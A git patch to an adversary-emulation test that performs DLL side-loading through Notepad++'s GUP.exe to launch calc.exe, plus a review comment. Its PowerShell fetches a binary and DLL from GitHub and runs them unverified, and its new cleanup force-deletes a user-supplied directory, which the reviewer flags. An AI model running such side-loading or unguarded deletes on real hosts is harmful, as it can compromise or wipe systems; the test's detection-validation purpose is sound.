From 56bdcf5d81ead16a30008cf84f9c778ae809ab1d Mon Sep 17 00:00:00 2001
From: Jasmine Le
Date: Tue, 17 Sep 2024 13:59:05 -0700
Subject: [PATCH] Update Windows Atomic Tests to TTP #2
Summary: Converting atomics to ttps in Windows Atomic Red Team Tests This ttp was 2/10 and it performs the follow function: DLL Side-Loading using the Notepad++ GUP.exe binary
Reviewed By: godlovepenn
Differential Revision: D62892914
---
 .../windows/dll-side-loading/README.md | 7 +-
 .../dll-side-loading/dll-side-loading.yaml | 81 ++++++++++++++-----
 2 files changed, 67 insertions(+), 21 deletions(-)
diff --git a/ttps/persistence/windows/dll-side-loading/README.md b/ttps/persistence/windows/dll-side-loading/README.md
index d7f5830..dfca11f 100644
--- a/ttps/persistence/windows/dll-side-loading/README.md
+++ b/ttps/persistence/windows/dll-side-loading/README.md
@@ -8,11 +8,12 @@ Derived from [Atomic Red Team T1574.002](https://github.com/redcanaryco/atomic-r
 ## Arguments
 - **process_name**: a string flag specifying the name of created calc process. Default is "CalculatorApp".
-- **gup_exe**: a path flag specifying location of GUP.exe. Default is "bin\GUP.exe".
-- **curl_dll**: a path flag specifying location of libcurl.dll. Default is "bin\libcurl.dll".
+- **gup_exe**: a string flag specifying location of GUP.exe. Default is "$PWD\bin\GUP.exe".
+- **curl_dll**: a string flag specifying location of libcurl.dll. Default is "$PWD\bin\libcurl.dll".
 ## Pre-requisites
 - Windows operating system equipped with powershell
+- libcurl.dll and GUP.exe must be in the same directory
 ## Examples
 You can run the TTP using the following example (after updating the arguments):
@@ -23,7 +24,7 @@ ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.
 ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.yaml --arg process_name=calc
 ```
 ```bash
-ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.yaml --arg gup_exe=bin\myGUP.exe --arg curl_dll=bin\mylibcurl.dll
+ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.yaml --arg gup_exe=test\myGUP.exe --arg curl_dll=test\mylibcurl.dll
 ```
 ## Steps
diff --git a/ttps/persistence/windows/dll-side-loading/dll-side-loading.yaml b/ttps/persistence/windows/dll-side-loading/dll-side-loading.yaml
index 3ab8af1..fb3e93e 100644
--- a/ttps/persistence/windows/dll-side-loading/dll-side-loading.yaml
+++ b/ttps/persistence/windows/dll-side-loading/dll-side-loading.yaml
@@ -3,8 +3,8 @@ api_version: 2.0
 uuid: a0dbea02-4978-4318-9af7-1aef1e2d2409
 name: DLL Side-Loading using the Notepad++ GUP.exe binary
 description: |
- GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
- Upon execution, calc.exe will be opened.
+ GUP is an open source signed binary used by Notepad++ for software updates, and it is vulnerable to DLL Side-Loading.
+ This enables the libcurl dll to be loaded and upon execution, calc.exe will be opened.
 Derived from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary
 requirements:
 platforms:
@@ -23,40 +23,85 @@ args:
 default: CalculatorApp
 - name: gup_exe
 description: GUP is an open source signed binary used by Notepad++ for software updates
- type: path
- default: bin\GUP.exe
+ type: string
+ default: $PWD\bin\GUP.exe
 - name: curl_dll
 description: GUP requires libcurl.dll to function
- type: path
- default: bin\libcurl.dll
+ type: string
+ default: $PWD\bin\libcurl.dll
 steps:
 - name: execute_GUP
 executor: powershell
 description: |
- GUP.exe binary must exist on disk at specified location ({{.Args.gup_exe}}).
 Downloads GUP.exe, if not provided, and executes binary.
 inline: |
- $parent = Split-Path "{{.Args.gup_exe}}" -Parent
+
+ Write-Host "GUP.exe binary must exist on disk at specified location ({{.Args.gup_exe}})."
+
+ $parentExe = Split-Path "{{.Args.gup_exe}}" -Parent
+ $parentDll = Split-Path "{{.Args.curl_dll}}" -Parent
+
+ if ($parentExe -cne $parentDll){
+ Write-Host "Error: GUP.exe and libcurl.dll must be in the same directory."
+ Write-Host "GUP.exe at: {{.Args.gup_exe}}"
+ Write-Host "libcurl.dll at: {{.Args.curl_dll}}"
+ exit 1
+ }
+
 if (-Not (Test-Path "{{.Args.gup_exe}}")) {
- New-Item -Type Directory -Path ${parent} -ErrorAction Ignore | Out-Null
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "{{.Args.gup_exe}}"
- New-Item -ItemType File -Path "${parent}\.downloaded" -ErrorAction ignore | Out-Null
+ Write-Host "GUP.exe not found. Downloading..."
+ New-Item -Type Directory -Path ${parentExe} -ErrorAction Ignore | Out-Null
+ try {
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "{{.Args.gup_exe}}"
+ } catch {
+ Write-Host "Failed to download GUP.exe : $_"
+ exit 1
+ }
+ Write-Host "GUP.exe downloaded to: {{.Args.gup_exe}}"
+ } else {
+ Write-Host "GUP.exe already exists at: {{.Args.gup_exe}}"
 }
+
 if (-Not (Test-Path "{{.Args.curl_dll}}")) {
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/libcurl.dll?raw=true" -OutFile "${parent}\libcurl.dll"
- New-Item -ItemType File -Path "${parent}\.downloaded" -ErrorAction ignore | Out-Null
+ Write-Host "libcurl.dll not found. Downloading..."
+ New-Item -Type Directory -Path ${parentDll} -ErrorAction Ignore | Out-Null
+ try {
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/libcurl.dll?raw=true" -OutFile "{{.Args.curl_dll}}"
+ } catch {
+ Write-Host "Failed to download libcurl.dll : $_"
+ exit 1
+ }
+ Write-Host "libcurl.dll downloaded to: {{.Args.curl_dll}}"
 } else {
- Copy-Item -Path "{{.Args.curl_dll}}" -Destination "${parent}\libcurl.dll"
+ Write-Host "libcurl.dll already exists at: {{.Args.curl_dll}}"
 }
- &"{{.Args.gup_exe}}"
+ Write-Host "Executing GUP.exe to test sideloading ....."
+ &{{.Args.gup_exe}}
 cleanup:
 executor: powershell
 inline: |
- stop-process -name {{.Args.process_name}}
+ try {
+ Write-Host "Attempting to stop {{.Args.process_name}} process..."
+ Stop-Process -Name "{{.Args.process_name}}" -ErrorAction Stop
+ Write-Host "Successfully stopped {{.Args.process_name}}"
+ } catch {
+ Write-Host "Failed to stop {{.Args.process_name}}: $_"
+ }
+
 $parent = Split-Path "{{.Args.gup_exe}}" -Parent
- if (Test-Path "${parent}\.downloaded"){
- remove-item -r $parent
+ Write-Host "Parent directory to clean up: $parent"
+
+ if (Test-Path $parent) {
+ Write-Host "Attempting to remove directory: $parent"
+ Remove-Item -Path $parent -Recurse -Force -ErrorAction SilentlyContinue
+ if ($?) {
+ Write-Host "Successfully removed $parent"
+ } else {
+ Write-Host "Failed to remove $parent"
+ }
+ } else {
+ Write-Host "Directory $parent does not exist. No cleanup needed."
 }
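Review bot: The cleanup step now runs `Remove-Item -Path $parent -Recurse -Force` on the parent directory of gup_exe whenever that directory exists, whereas the removed lines only did so behind the `${parent}\.downloaded` sentinel that marked a directory the execute step had created; with the argument now a free-form string, `gup_exe=C:\tools\GUP.exe` deletes `C:\tools` on cleanup, and `gup_exe=C:\GUP.exe` makes `$parent` the drive root. The execute step also drops the sentinel it used to write after a download, so cleanup has nothing left to tell an operator-supplied directory from one this TTP created. I would record at download time whether the directory pre-existed, write the sentinel only when this step created it, and recurse-delete only behind the sentinel, as sketched below. Two smaller points in the same hunk: `&{{.Args.gup_exe}}` drops the quotes the removed line had, so a supplied path containing a space is split into command and argument once the template is rendered (`& "{{.Args.gup_exe}}"` keeps the `$PWD` expansion and survives spaces), and `-cne` makes the same-directory check case-sensitive although the paths compared are case-insensitive Windows paths (`-ne`). The two Invoke-WebRequest calls still execute whatever was fetched without an integrity check; comparing `(Get-FileHash "{{.Args.gup_exe}}").Hash` against a pinned value before the call operator would keep the test reproducible and protect the operator's host from a tampered artifact.
```yaml
    inline: |
      # … unchanged: banner, $parentExe/$parentDll, same-directory check …
      if (-Not (Test-Path "{{.Args.gup_exe}}")) {
        Write-Host "GUP.exe not found. Downloading..."
        $createdDir = -Not (Test-Path $parentExe)
        New-Item -Type Directory -Path ${parentExe} -ErrorAction Ignore | Out-Null
        # … unchanged: try/catch around Invoke-WebRequest, "downloaded to" message …
        if ($createdDir) {
          New-Item -ItemType File -Path "${parentExe}\.downloaded" -ErrorAction Ignore | Out-Null
        }
      } else {
        # … unchanged: "already exists" message …
      }
      # … unchanged: libcurl.dll block and GUP.exe execution …
  cleanup:
    executor: powershell
    inline: |
      # … unchanged: Stop-Process try/catch …
      $parent = Split-Path "{{.Args.gup_exe}}" -Parent
      if (Test-Path "${parent}\.downloaded") {
        Write-Host "Removing directory created by this TTP: $parent"
        Remove-Item -Path $parent -Recurse -Force -ErrorAction SilentlyContinue
      } else {
        Write-Host "Directory $parent was not created by this TTP; leaving it in place."
      }
```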